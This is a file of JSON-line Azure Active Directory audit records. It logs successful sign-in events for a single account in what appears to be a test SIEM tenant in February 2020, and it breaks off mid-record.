-{"InterSystemsId": "9270f20a-56f2-493e-b6a7-a859adcaf626", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:13:36", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "ApplicationId": "00000002-0000-0ff1-ce00-000000000000", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0ff1-ce00-000000000000"}], "ObjectId": "00000002-0000-0ff1-ce00-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "97aa710f-536f-44c8-a8d5-711dc55f5500", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "d2bb7eae-bc6e-42d2-b270-a885ec626235"}
-{"InterSystemsId": "97c52753-c410-438f-89e2-22741e5ccc6a", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T10:51:49", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "79.159.10.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "79.159.10.151", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "c9ef5d5f-e3af-4669-b465-921d8b58bd00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "03de6d95-b955-451c-8311-473b6853d774"}
-{"InterSystemsId": "9e0a494b-0db0-4481-a70e-eea6124b7018", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:43:37", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "213.97.47.133", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "213.97.47.133", "ApplicationId": "e48d4214-364e-4731-b2b6-47dabf529218", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000004-0000-0ff1-ce00-000000000000"}], "ObjectId": "00000004-0000-0ff1-ce00-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "e7a84bcf-41ff-4953-8e99-fb1820685f00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "ac8fcffb-7c44-498d-ad6b-24b85a3a1b59"}
-{"InterSystemsId": "9fc4af4c-bf19-4f88-92ac-0fd029ca21bd", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:13:36", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "56fa424b-64bd-4ea5-abc4-38256f8a5600", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "880fb7bc-5708-42d1-86a8-760c32ac5e6b"}
-{"InterSystemsId": "a35e980b-88be-4343-9691-629473e01983", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T21:38:37", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "79.159.10.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "79.159.10.151", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "5f09333a-842c-47da-a157-57da27fcbca5"}], "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "78a2aa65-5026-4124-970a-00e06dc7df00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "30c7afcc-f74d-4b5a-898e-ce72da9386b8"}
-{"InterSystemsId": "a89e9b3b-b394-4ecf-8abc-a3f6aaf9237f", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-06T09:28:00", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "bfe22fb6-c763-4972-91a7-5b13d3d51400", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "d4f90f07-f5c4-4b36-a81c-6c9bae8660d6"}
-{"InterSystemsId": "aca3d9a3-792d-4357-87c6-ef50c3215baa", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:28:52", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "5f09333a-842c-47da-a157-57da27fcbca5"}], "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "f67a1615-4606-4673-b6fb-68f714fa2200", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "d2ad235b-d73f-4bd8-8aef-6e4909ee1b7c"}
-{"InterSystemsId": "ae211253-88cf-4921-9014-2f9beab64fb0", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:13:37", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "5f09333a-842c-47da-a157-57da27fcbca5"}], "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "ccfec0f3-498b-43b1-a4c0-fb42f0fb5300", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "8ff18278-32ca-49d1-8658-91e577e0854f"}
-{"InterSystemsId": "b3997fcc-6b0e-45b1-b88d-b4ee4a8a7ddc", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:28:52", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000003-0000-0000-c000-000000000000"}], "ObjectId": "00000003-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "c1ffa732-6576-4f86-9294-44387abc1f00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "a3939990-f7b4-4dc5-af4d-42b70a9485ea"}
-{"InterSystemsId": "b3ab6d58-7b90-45d6-95e3-ee11333ebc34", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:13:01", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "d949d6c2-472e-4901-bd70-96cb90424c00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "61ba70f4-bd75-4bc2-a681-2e219d920e63"}
-{"InterSystemsId": "b5c5fd00-b659-413e-8739-6271a4d70506", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T10:53:12", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "79.159.10.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "79.159.10.151", "ApplicationId": "80ccca67-54bd-44ab-8625-4b79c4dc7775", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "fabbe34e-a6dd-46f8-805f-4ca633c2ae00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "3e17bf8e-92de-45b6-b668-7618ab0e0c95"}
-{"InterSystemsId": "b744259e-13e0-43d7-9f56-82cdbd54cf7c", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T10:52:06", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "79.159.10.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "79.159.10.151", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "5f09333a-842c-47da-a157-57da27fcbca5"}], "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "ce9f104d-1a1b-488e-9313-b9729e99c400", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "f100d714-ffa2-4077-bf90-2f57a3b366c0"}
-{"InterSystemsId": "b7d9a234-9fdd-4e36-9cf3-fd825f22697a", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-08T14:33:50", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "37.29.234.179", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "37.29.234.179", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "49092519-a590-4207-b1b3-1d49f9100a00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "4b0f0d57-0766-4621-8aa0-04b8d8b63a78"}
-{"InterSystemsId": "bb677f9e-953a-4bde-bb91-0ef8209200a1", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:13:38", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000003-0000-0000-c000-000000000000"}], "ObjectId": "00000003-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "1da3c318-642f-48dc-836b-e83b27655b00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "8d9a1fa8-7b85-4c5d-9e96-5728d572fb95"}
-{"InterSystemsId": "c355f078-53d7-4d60-b836-851a09a98208", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:05", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "213.97.47.133", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "213.97.47.133", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000003-0000-0000-c000-000000000000"}], "ObjectId": "00000003-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "20e56367-e902-4200-855b-2ef7b99e5f00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "9756fe5b-ea0d-42fa-a665-be8e0eb100e5"}
-{"InterSystemsId": "c5874ff2-7c53-4d51-9252-7abbf0524b1c", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:28:51", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "3188aef9-6b4e-44f2-8455-c28b49552200", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "abbf584f-b3a9-4b6d-9b37-4cc4b802ca4d"}
-{"InterSystemsId": "cf2168a1-6537-4ed6-80a5-797c3458180c", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:25:21", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000003-0000-0000-c000-000000000000"}], "ObjectId": "00000003-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "23f53edd-63a7-4292-9d80-4fbc49c11e00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "d137a5e4-7004-493a-acca-5fb167d1f207"}
-{"InterSystemsId": "d21f6867-0670-4c94-b6fa-bde326fcf3c6", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T21:38:20", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "79.159.10.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "79.159.10.151", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": 